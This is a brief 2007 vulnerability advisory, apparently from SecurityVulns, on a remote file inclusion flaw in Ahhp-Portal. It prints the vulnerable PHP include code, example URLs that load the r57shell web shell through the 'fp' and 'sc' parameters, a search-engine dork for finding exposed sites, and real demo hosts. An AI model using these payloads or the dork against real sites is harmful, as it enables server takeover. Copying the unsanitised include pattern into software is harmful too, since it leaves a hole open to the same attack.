Ahhp(php)-Portal Remote File Inclusion

2007-04-25T00:00:00
ID SECURITYVULNS:DOC:16838
Type securityvulns
Reporter Securityvulns
Modified 2007-04-25T00:00:00

Description

Ahhp-Portal Remote File Inclusion

SЭTE:www.ahhope.org

Demo:http://xinan.ahtcm.edu.cn Demo2http://www.hfspaq.gov.cn

Vul Code:

                    <?
    if ($sc=='')
        include($fp.".php");
    else
        include($sc."/".$fp.".php");    
    ?>

example:

http://site/page.php?fp=r57shell? http://site/page.php?sc=r57shell?

////////////////////////////////////////////////////

Credit : CodeXpLoder'tq

mail : codexploder[at]hotmail[dot]com

site : expw0rm.com

Google :

"page.php?fp"

// Exploit Worm www.expw0rm.com